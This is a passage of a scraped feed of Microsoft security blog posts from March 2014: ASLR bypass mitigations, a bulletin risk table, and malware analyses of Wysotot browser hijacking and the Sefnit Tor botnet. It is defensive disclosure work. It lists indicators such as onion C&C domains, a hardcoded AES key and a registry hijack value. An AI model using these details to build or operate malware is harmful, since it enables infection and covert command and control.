style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;"><span style="font-family:Calibri;"><span style="font-size:medium;">As noted at beginning of this blog, Internet Explorer 10/11 and Office 2013 are not affected by ASLR bypasses introduced by 3</span><sup><span style="font-size:small;">rd</span></sup><span style="font-size:medium;"> party modules and plugins. Instead, customers still running older version of Internet Explorer and Office can take advantage of two effective tools that can be used to enforce ASLR mitigation for any module:</span></span></p> <ul style="text-align:justify;"> <li> <p><span style="font-size:medium;"><span style="text-decoration:underline;"><a href="http://www.microsoft.com/emet">EMET (Enhanced Mitigation Experience Toolkit)</a></span>: can be used to enable system-wide <span style="font-size:medium;">ASLR </span>or &ldquo;MandatoryASLR&rdquo; selectively on any process;</span></p> </li> <li> <p><span style="font-size:medium;"><span style="text-decoration:underline;"><a href="http://support.microsoft.com/kb/2639308">&ldquo;Force ASLR&rdquo; update KB2639308</a></span>: makes possible for selected applications to forcibly relocate images not built with /DYNAMICBASE using Image File Execution Options (IFEO) registry keys;</span></p> <p>&nbsp;</p> </li> </ul> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;"><strong>Conclusions</strong><br /></span></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">ASLR bypasses do not represent vulnerabilities, since they have to be combined with a real memory corruption vulnerability in order to allow attackers to create an exploit, however it&#39;s nice to see that closing ASLR bypasses can negatively&nbsp;impact the reliability of certain targeted attacks. </span><span style="font-family:Calibri;font-size:medium;">We encourage all customers to proactively test and deploy the suggested tools when possible, especially for old programs commonly targeted by memory corruption exploits. We expect that attackers will continue increasing their focus and research on </span><span style="font-family:Calibri;font-size:medium;"><a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html">more sophisticated ASLR bypasses </a></span><span style="font-family:Calibri;font-size:medium;">which rely on disclosure of memory address rather than non-ASLR libraries.</span><span style="font-family:Calibri;font-size:medium;"><br /></span></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;"><span style="font-size:medium;">- Elia Florio, MSRC Engineering</span></p> <p style="text-align:justify;"><span style="font-size:medium;">&nbsp;</span></p> </div> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624728&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">VSAVB7RTCVE-2014-0324ForceASLRMS13-006ASLRMS14-009HXDSLdrHotPatchRoutineEMET Assessing risk for the March 2014 security updates http://blogs.technet.com/b/srd/archive/2014/03/11/assessing-risk-for-the-march-2014-security-updates.aspxTue, 11 Mar 2014 17:02:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a93f3f3c-3f79-43e0-ab81-3932d4cc1f8aSRD Blog Author0<p>Today we released five security bulletins addressing 23 unique CVE&rsquo;s. Two bulletins have a maximum severity rating of Critical while the other three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td>Most likely attack vector</td> <td>Max Bulletin Severity</td> <td>Max Exploit-ability</td> <td>Likely first 30 days impact</td> <td>Platform mitigations and key notes</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-012">MS14-012</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses vulnerability described by <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">Security Advisory 2934088</a>, an issue under targeted attack.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-013">MS14-013</a> <p>(DirectShow)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>3</td> <td>Unlikely to see reliable exploits developed within next 30 days.</td> <td>Addresses single double-free issue in qedit.dll, reachable via a malicious webpage.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-014">MS14-014</a> <p>(Silverlight)</p> </td> <td>Attacker combines this vulnerability with a (separate) code execution vulnerability to execute arbitrary code in the browser security context.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution with this vulnerability.</td> <td>This vulnerability does not result in code execution directly. However, it is a component attackers could&nbsp;use to bypass ASLR.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-015">MS14-015</a> <p>(Kernel mode drivers)</p> </td> <td>Attacker running code at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-016">MS14-016</a> <p>(Security Account Manager)</p> </td> <td>Attacker able to make API calls to security account manager password API able to brute-force password guessing attempts without triggering account lockout policy.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution with this vulnerability.</td> <td>Attacker must authenticate before calling the affected API. After authenticating, the attacker can choose to guess either their own or other user&#39;s password without risk of lockout.</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624765&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk Asessment The March 2014 Security Updateshttp://blogs.technet.com/b/msrc/archive/2014/03/11/the-march-2014-security-updates.aspxTue, 11 Mar 2014 17:01:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:04e7a7a0-96e8-4f15-813e-6d5ba65f6e79Dustin C. Childs0<p><span style="font-family:Calibri;font-size:medium;">This month we release </span><a href="http://technet.microsoft.com/security/bulletin/MS14-mar"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">five bulletins</span></a><span style="font-family:Calibri;font-size:medium;"> to address 23 unique CVEs in Microsoft Windows, Internet Explorer and Silverlight. If you need to prioritize, the update for Internet Explorer addresses the issue first described in </span><a href="http://technet.microsoft.com/en-us/security/advisory/2934088"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Security Advisory 2934088</span></a><span style="font-family:Calibri;font-size:medium;">, so it should be at the top of your list. While that update does warrant your attention, I want to also call out another impactful update. </span></p> <p><span style="font-family:Calibri;font-size:medium;">MS14-014 provides an update to address a security feature bypass in Silverlight. The issue wasn&rsquo;t publicly known and it isn&rsquo;t under active attack, however it can impact your security in ways that aren&rsquo;t always obvious. Specifically, the update removes an avenue attackers could use to bypass&nbsp;</span><a href="http://msdn.microsoft.com/en-us/library/bb430720.aspx"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">ASLR</span></a><span style="font-family:Calibri;font-size:medium;"> protections. Fixes like this one increase the cost of exploitation to an attacker, who must now find a different way to make their code execution exploit reliable. Picasso said, &ldquo;The hidden harmony is better than the obvious&rdquo; - Shutting down an ASLR bypass could be considered one of the most harmonious things to do to help increase customer security.</span></p> <p><span style="font-family:Calibri;font-size:medium;">Let&rsquo;s not forget the other updates we released today. This month we release two Critical and three Important bulletins. Here&rsquo;s an overview of this month&rsquo;s release:</span></p> <p><span style="font-family:Calibri;"><span style="font-size:medium;"><i>Click to enlarge<br /></i></span></span></p> <p><span style="font-family:Calibri;"><span style="font-size:medium;"><i><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2248.March_5F00_Deployment.jpg"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2248.March_5F00_Deployment.jpg" border="0" /></a><br /></i></span></span></p> <p><span style="font-family:Calibri;font-size:medium;">Our top deployment priority this month is MS14-012, which address 18 issues in Internet Explorer.</span></p> <p><a href="http://technet.microsoft.com/security/bulletin/ms14-012"><span style="color:#0563c1;"><span style="font-family:Calibri;"><span style="font-size:medium;">MS14-012 | Cumulative Security Update for Internet Explorer&nbsp; </span></span></span></a><span style="font-family:Calibri;"><span style="font-size:medium;">&nbsp;<br /> This cumulative update addresses one public and 17 privately disclosed issues in Internet Explorer. These issues could allow remote code execution if a user views a specially crafted webpage using an affected version of Internet Explorer. We are aware of targeted attacks using CVE-2014-0322 against Internet Explorer 10. This issue was first described in </span></span><a href="http://technet.microsoft.com/security/advisory/2934088"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Security Advisory 2934088</span></a><span style="font-family:Calibri;font-size:medium;">, which included a </span><a href="https://support.microsoft.com/kb/2934088"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Fix it</span></a><span style="font-family:Calibri;font-size:medium;"> for the issue. We should also note that the observed attacks performed a check for the presence of the Enhanced Mitigation Experience Toolkit (EMET) and did not proceed if it was detected. This update also addresses CVE-2014-0324, which is a privately reported issue that has been seen in a very limited, targeted attack against Internet Explorer 8. Thanks to a previously released ASLR bypass update, the attack seen in the wild would not work against a fully updated system running Windows Vista and above. The </span><a href="http://blogs.technet.com/b/srd/archive/2014/03/11/when-aslr-makes-the-difference.aspx"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">SRD blog</span></a><span style="font-family:Calibri;font-size:medium;"> goes into more detail about how shutting down that </span><a href="http://technet.microsoft.com/security/bulletin/ms13-106"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">bypass</span></a><span style="font-family:Calibri;font-size:medium;"> helped. For all issues addressed by this update, successful exploitation could allow an attacker to gain the same user rights as the local user. Customers with automatic updates enabled will not need to take action, as they will be updated automatically.</span></p> <p><span style="font-family:Calibri;font-size:medium;">We are also revising </span><a href="http://technet.microsoft.com/security/advisory/2755801"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Security Advisory 2755801</span></a><span style="font-family:Calibri;font-size:medium;"> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin </span><a href="http://helpx.adobe.com/security/products/flash-player/apsb14-08.html" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">APSB14-08</span></a><span style="font-family:Calibri;font-size:medium;">. For more information about this update, including download links, see </span><a href="http://support.microsoft.com/kb/2938527" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Knowledge Base Article 2938527</span></a><span style="font-family:Calibri;font-size:medium;">. Also, for those of you who may be interested, </span><a href="https://support.microsoft.com/kb/894199"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">KB864199</span></a><span style="font-family:Calibri;font-size:medium;"> provides a list of the non-security updates released today. This list includes the latest update for the Malicious Software Removal Tool (MSRT), which now includes detections for the </span><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fWysotot"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Wysotot</span></a><span style="font-family:Calibri;font-size:medium;"> and </span><a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=BrowserModifier:Win32/Spacekito"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Spacekito</span></a><span style="font-family:Calibri;font-size:medium;"> malware families. </span></p> <p><span style="font-family:Calibri;font-size:medium;">Watch the bulletin overview video below for a brief summary of today&#39;s releases.</span></p> <p><span style="font-family:Calibri;font-size:medium;"><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/fa536jd5zfQ?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="500" height="281" src="http://www.youtube.com/v/fa536jd5zfQ?version=3&amp;hl=en_US" type="application/x-shockwave-flash" /></object></span></p> <p><span style="font-family:Calibri;font-size:medium;">For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the </span><a href="http://technet.microsoft.com/security/bulletin/MS14-Mar"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Bulletin Summary Webpage</span></a><span style="font-family:Calibri;font-size:medium;">. </span></p> <p><span style="font-family:Calibri;font-size:medium;">My colleagues Andrew Gross and Pete Voss will host the monthly bulletin webcast and answer your questions about this month&rsquo;s release. As usual, the webcast is scheduled for Wednesday, March 12, 2014, at 11 a.m. PDT. Please register </span><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572977&amp;Culture=en-US"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">here</span></a><span style="font-family:Calibri;font-size:medium;">, and tune in to learn more about this month&rsquo;s security bulletins and advisories. </span></p> <p><span style="font-family:Calibri;font-size:medium;">For all the latest information, you can also follow us at </span><a href="http://www.twitter.com/msftsecresponse"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">@MSFTSecResponse</span></a><span style="font-family:Calibri;font-size:medium;">. </span></p> <p><span style="font-family:Calibri;font-size:medium;">If you happen to be at the CanSecWest conference in Vancouver, B.C, please swing by our booth (number 4) to say hello!</span></p> <p><span style="font-family:Times New Roman;font-size:medium;"> </span>Thanks, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a> <br /> Group Manager, Response Communications <br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624767&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Windowsmonthly bulletin releaseSecurity BulletinsBulletinsMalicious Software Removal Tool (MSRT)Internet Explorer (IE) MSRT March 2014 – Wysotothttp://blogs.technet.com/b/mmpc/archive/2014/03/11/msrt-march-2014-wysotot.aspxTue, 11 Mar 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:cb014604-f7eb-4225-b067-257ed86761b8msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/03/11/msrt-march-2014-wysotot.aspx#comments<div class="ExternalClass1C75481000774D0C8E48842B4D80E1E1"> <p>This month the Microsoft Malicious Software Removal Tool (MSRT) will include the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Wysotot">Win32/Wysotot</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=MSIL/Spacekito">MSIL/Spacekito</a> families. Below we discuss the history and common behaviors of the Win32/Wysotot&nbsp;family of malware.</p> <p>We first added detection for Win32/Wysotot in October 2013. Figure 1 shows the number of machine encounters since then.&nbsp;</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso1b.png"><img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso1b.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Wysotot detections</em></p> <p>Win32/Wysotot is usually installed by software bundlers. Figure 2 shows some of the programs we have seen downloading Win32/Wysotot variants.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso2.png"><img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2: Programs that we have seen bundle Win32/Wysotot variants</em></p> <p>Win32/Wysotot can change the start page for common web browsers. The malware executes its payload in two ways:</p> <ol> <li>Modifying the following registry entry:<br /><em>HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command = &quot;&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; hxxp://en.v9.com/?utm_source=b&amp;utm_medium=eBP&amp;utm_campaign=eBP&amp;utm_content=sc&amp;from=eBP&amp;uid=&lt;some text&gt;&amp;ts=&lt;some timestamp&gt;&ldquo;</em></li> <li>Modifying .LNK files that point to popular browsers (Internet Explorer, Firefox, Chrome and Opera). Win32/Wysotot modifies the .LNK files by searching for browser .LNKs&nbsp; harvested in&nbsp;one of two ways:</li> </ol> <ul> <li>It determines the location for Programs in the Start Menu <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso3.png"><img width="400" alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso3.png" border="0" /></a>&nbsp;</p> </li> <li>A hardcoded path to the Quick Launch folder<br /> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso4.png"><img width="400" alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso4.png" border="0" /></a>&nbsp;</p> </li> </ul> <p>Through the folders mentioned above, Win32/Wysotot will search for all .LNK files and then check if each one is related to a web browser that&nbsp;it targets. If it finds a match it then modifies the .LNK file directly.</p> <p>In our testing, the modified browser start pages commonly point to one of the following domains:</p> <ul> <li><em>delta-homes.com</em></li> <li><em>onmylike.com</em></li> <li><em>v9.com</em></li> <li><em>v9tr.com</em></li> <li><em>22find.com</em></li> </ul> <p>Figure 3 shows a sample screen shot of the modified .LNK file.</p> <p><br /> <a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso5.png"><img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso5.png" border="0" /></a><em>Figure 3: The modified .LNK file</em></p> <p>There is more detailed information about this family in the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Wysotot">Win32/Wysotot</a> description. The best protection from this and other threats is to run a real-time, up-to-date security product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Edgardo Diaz</em></p> <p><em>MMPC</em></p> <p>&nbsp;</p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624502&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Advance Notification Service for the March 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/03/06/advance-notification-server-for-the-march-2014-security-bulletin-release.aspxThu, 06 Mar 2014 18:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:d88c44b4-8491-42c2-8c77-80d3e57e12a4Dustin C. Childs0<p><span style="font-family:helvetica;font-size:small;">Today we provide <a href="http://technet.microsoft.com/security/bulletin/MS14-mar"><span style="color:#0563c1;">advance notification</span></a> for the release of five bulletins for March 2014, two rated Critical and thee rated Important in severity. These updates address issues in Microsoft Windows, Internet Explorer and Silverlight. </span></p> <p><span style="font-family:helvetica;font-size:small;">The update provided in MS14-012 fully addresses the issue first described in <a href="http://technet.microsoft.com/security/advisory/2934088"><span style="color:#0563c1;">Security Advisory 2934088</span></a>. While we have seen a limited number of attacks using this issue, they have only targeted Internet Explorer 10. Customers using other versions of Internet Explorer have not been impacted.</span></p> <p><span style="font-family:helvetica;font-size:small;">As always, we&rsquo;ve scheduled the security bulletin release for the second Tuesday of the month, March 11, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for analysis of the risk and impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s updates. Until then, please review the <a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-mar"><span style="color:#0563c1;">ANS summary page</span></a> for more information to help you prepare for security bulletin testing and deployment.</span></p> <p><span style="font-family:helvetica;font-size:small;">Don&rsquo;t forget, you can also follow the MSRC team&rsquo;s recent activity on Twitter at <a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;">@MSFTSecResponse</span></a>.&nbsp;</span></p> <p><span style="font-family:helvetica;font-size:small;"> Thank you,</span><br /><span style="font-family:helvetica;font-size:small;"> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><br /><span style="font-family:helvetica;font-size:small;"> Group Manager, Response Communications</span><br /><span style="font-family:helvetica;font-size:small;"> Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624407&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsSilverlightSecurity AdvisoryANSInternet Explorer (IE) Sefnit’s Tor botnet C&C detailshttp://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-amp-c-details.aspxWed, 05 Mar 2014 21:54:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:dec82ecb-4c7d-4f31-900b-612ded112f58msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-amp-c-details.aspx#comments<div class="ExternalClassB6D358E92DA249E6BEEDE55B2A394941"> <p>​We have talked about the impact that resulted from the <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx">Sefnit botnet Tor hazard</a> as well as the clean-up effort that went into that threat. In this post we&rsquo;d like to introduce some of the details regarding the Tor component&rsquo;s configuration and its communication with the Tor service. Specifically, we&rsquo;ll talk about how <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Sefnit.AT">Trojan:Win32/Sefnit.AT</a> communicates with the Tor network, what domains it tries to contact, and where it keeps its configuration data.</p> <p>After Sefnit installs the Tor-based malware component, which is typically named <em>wins.exe</em>, a copy of a non-malicious Tor client is also installed and added as a Windows service. This service is started every time Windows starts and is configured to accept connections on TCP ports 9051 and 9050. However, since these ports are bound to the loopback interface, which is not remotely accessible, no additional threats are added to the infected PC.</p> <h3>Tor service interaction</h3> <p>The TCP port 9051 is the control port for the legitimate local Tor service and is used to control most of the aspects of a Tor client. So far, however, we have only observed this port being used by malware to obtain status information regarding the connection to the Tor network. This is accomplished by periodically requesting status updates using the <a href="https://gitweb.torproject.org/torspec.git?a=blob_plain;hb=HEAD;f=control-spec.txt">control protocol</a>.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft1.jpg"> <img alt="empty authentication request" src="http://www.microsoft.com/security/portal/blog-images/a/Seft1.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Malware sends an empty authentication request </em></p> <p>From this example we can see that Win32/Sefnit.AT sends an empty authentication request and receives a successful response (250), which means that all authentication methods for the installed Tor client are disabled. Since the TCP port is not accessible remotely, the lack of authentication poses no threat to the victim&rsquo;s PC. Additionally, the malware requests the current state of a Tor circuit, which in this case is established, meaning the Tor client is connected to the anonymizing network.</p> <p>The TCP port 9050 is used as a communication point for the SOCKS proxy, which allows any application that can be configured to use a proxy server to communicate over Tor. The malware uses this method to contact its command and control (C&amp;C) web servers. This bypasses the traditional network infrastructure since traffic over the Tor network is encrypted, which also prevents network-based IDS from detecting the malware. The C&amp;C endpoints utilize the <a href="https://www.torproject.org/docs/hidden-services.html.en">Tor hidden service</a> which allows using the anonymizing network to host web servers without compromising the location and identity of the server owners.</p> <p>In order to contact a web server that uses the Tor hidden service feature the network uses a special domain naming scheme. The server&rsquo;s name is derived from its public key within the Tor network appended with <em>.onion </em>as the <a href="http://archive.icann.org/en/tlds/">top level domain</a> as opposed to .<em>com</em> or .<em>net</em>. The malware contains a list of .<em>onion</em> domains that are contacted using the standard HTTP protocol (over SOCKS):</p> <ul> <li><em> <span class="notranslate">6tlpoektcb3gudt3.onion </span></em></li> <li><em> <span class="notranslate">7fyipi6vxyhpeouy.onion </span></em></li> <li><em> <span class="notranslate">7sc6xyn3rrxtknu6.onion</span></em></li> <li><em> <span class="notranslate">ijqqxydixp4qbzce.onion </span></em></li> <li><em> <span class="notranslate">l77ukkijtdca2tsy.onion </span></em></li> <li><em> <span class="notranslate">lorpzyxqxscsmscx.onion</span></em></li> <li><em> <span class="notranslate">lqqciuwa5yzxewc3.onion </span></em></li> <li><em> <span class="notranslate">lqqth7gagyod22sc.onion </span></em></li> <li><em> <span class="notranslate">mdyxc4g64gi6fk7b.onion </span></em></li> <li><em> <span class="notranslate">onhiimfoqy4acjv4.onion</span></em></li> <li><em> <span class="notranslate">pomyeasfnmtn544p.onion</span></em></li> <li><em> <span class="notranslate">qxc7mc24mj7m4e2o.onion </span></em></li> <li><em> <span class="notranslate">wsytsa2omakx655w.onion </span></em></li> <li><em> <span class="notranslate">ye63peqbnm6vctar.onion </span></em></li> </ul> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft2.jpg"> <img width="500" alt="Sefnit attempts to create a proxy connection" src="http://www.microsoft.com/security/portal/blog-images/a/Seft2.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 2: Sefnit attempts to create a proxy connection</em></p> <p>From this example we can see the malware attempts to create a proxy connection to the <em>lqqciuwa5yzxewc3.onion </em>domain and succeeds. Next, data is submitted to the <em>/cache </em>directory on that server, which replies with a successful status code (200).</p> <h3>Malware configuration details</h3> <p>The list of CnC servers is stored inside a unique file and folder combination that at first glance appears to be randomly generated, although they have not changed much over time. Specifically, the malware creates a directory with the name <em>049e7fb749be2cdf169e28bb0a27254f</em> and inside places two files using the name <em>181084e525a65ef540c63d60ce07f836 </em>with two different extensions of .<em>ct </em>and .<em>ph</em>.</p> <p>During closer examination we identified that the apparently random directory is actually created by using the MD4 cryptographic hash function to compute a digest of a Unicode string <em>ps</em>. The resulting binary digest is converted into a hex representation and used as the directory name.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft3.png"><img width="500" alt="binary digest calculation" src="http://www.microsoft.com/security/portal/blog-images/a/Seft3.png" border="0" /></a>&nbsp;</p> <p><em>Figure 3: Calculation of the binary digest</em></p> <p>To generate the file names the same cryptographic function is used but this time to compute the digest of a Unicode GUID string {<em>b3717590-6447-47db-abca-a304803890cb</em>}, which after hex conversion results in <em>181084e525a65ef540c63d60ce07f836</em>.</p> <p>The PH file (<em>181084e525a65ef540c63d60ce07f836.ph</em>) may potentially serve as a botnet identifier since the data inside remains fairly static. In fact, it is the <a href="http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf">AES-256 </a>encrypted version of the same GUID string with encryption key <em>#?oUs?ai??+yIIZ?S?dcvDzI XOewA2</em>. This key is hard-coded in the malware binary.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft4.png"><img width="500" alt="The encryption key is hard coded" src="http://www.microsoft.com/security/portal/blog-images/a/Seft4.png" border="0" /></a>&nbsp;</p> <p><br /> <em>Figure 4: The encryption key is hard coded in the malware binary</em></p> <p>The CT file (<em>181084e525a65ef540c63d60ce07f836.ct</em>) contains the actual configuration data that is also encrypted using the AES-256 algorithm together with the same encryption key. The decrypted data is a serialized object, which appears to have been created using the Boost C++ library, and contains the following information:</p> <ul> <li>The victim&rsquo;s public IP address&nbsp;&nbsp;&nbsp;&nbsp;</li> <li>A string resembling an ID (for example, Verna) which is taken from the XOR obfuscated data inside the malware</li> <li>List of C&amp;C domains&nbsp;&nbsp;&nbsp;&nbsp;</li> <li>Current working directory of the malware</li> </ul> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft5.png"><img width="500" alt="decrypted data" src="http://www.microsoft.com/security/portal/blog-images/a/Seft5.png" border="0" /></a>&nbsp;</p> <p><em>Figure 5: The decrypted data is a serialized object</em></p> <p>Such configuration files are detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Sefnit%21cfg">Trojan:Win32/Sefnit!cfg</a>.</p> <p>In conclusion we have couple of interesting observations. First, the cryptographic code is compiled into the malware, as opposed to being dynamically loaded from an external DLL. Specifically, the code is based on the <a href="http://www.openssl.org/news/">OpenSSL</a> library version 1.0.0d released in February 2011. Additionally, the C&amp;C server responses, if we are to trust the response headers, indicate that some web servers use an old version 1.1.19 of <a href="http://wiki.nginx.org/Main">Nginx</a>, which is also from 2011. Lastly, you can use <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a> and <a href="http://www.microsoft.com/security/pc-security/windows-defender.aspx">Windows Defender</a> to detect and remove both the Sefnit malware and the configuration files.</p> <p><em>Dmitriy Pletnev</em></p> <p><em>MMPC </em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624389&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Life in the digital crosshairs: the untold storyhttp://blogs.msdn.com/b/sdl/archive/2014/03/05/life-in-the-digital-crosshairs-the-untold-story.aspxWed, 05 Mar 2014 17:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10505384SDL Team0http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10505384http://blogs.msdn.com/b/sdl/archive/2014/03/05/life-in-the-digital-crosshairs-the-untold-story.aspx#comments<p>To mark the 10 year anniversary since the creation of the Security Development Lifecycle, we wanted to tell the behind-the-scenes story of how the SDL came to be. <br />&nbsp;<br />Back in 2004, Microsoft decided that if we were going to succeed at building trust with our customers, security could not be an afterthought when developing our products and services.<br />&nbsp;<br />So how do you get a large organization like Microsoft to prioritize security with thousands of developers, writing millions of lines of code? How do you get everyone marching toward the same goal?&nbsp; <br />Hear from some of the people behind the scenes in security at Microsoft to discuss their journey and how they helped to fundamentally shift the culture within Microsoft.<br />&nbsp;<br />Get the never-before told inside story on Microsoft security: <a href="http://www.sdlstory.com">www.sdlstory.com</a></p> <p><a href="http://www.sdlstory.com"><img src="http://blogs.msdn.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-79-43/3568.sdl_2D00_10yr_2D00_twitter_2D00_440x220_2D00_1.jpg" alt="" border="0" /></a></p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p><br />&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10505384" width="1" height="1">Life in the digital crosshairsSDL 10 YearMicrosoft Security Development Lifecycle PC health – Part 1: Information stealing malwarehttp://blogs.technet.com/b/mmpc/archive/2014/03/03/pc-health-part-1-information-stealing-malware.aspxTue, 04 Mar 2014 00:13:34 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:4ef1e176-221a-4813-8610-dac435705947msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/03/03/pc-health-part-1-information-stealing-malware.aspx#comments<div class="ExternalClassDA13689EF19149E9BD5759CC1FC6FD42"> <p>When we were building Windows 8, MMPC 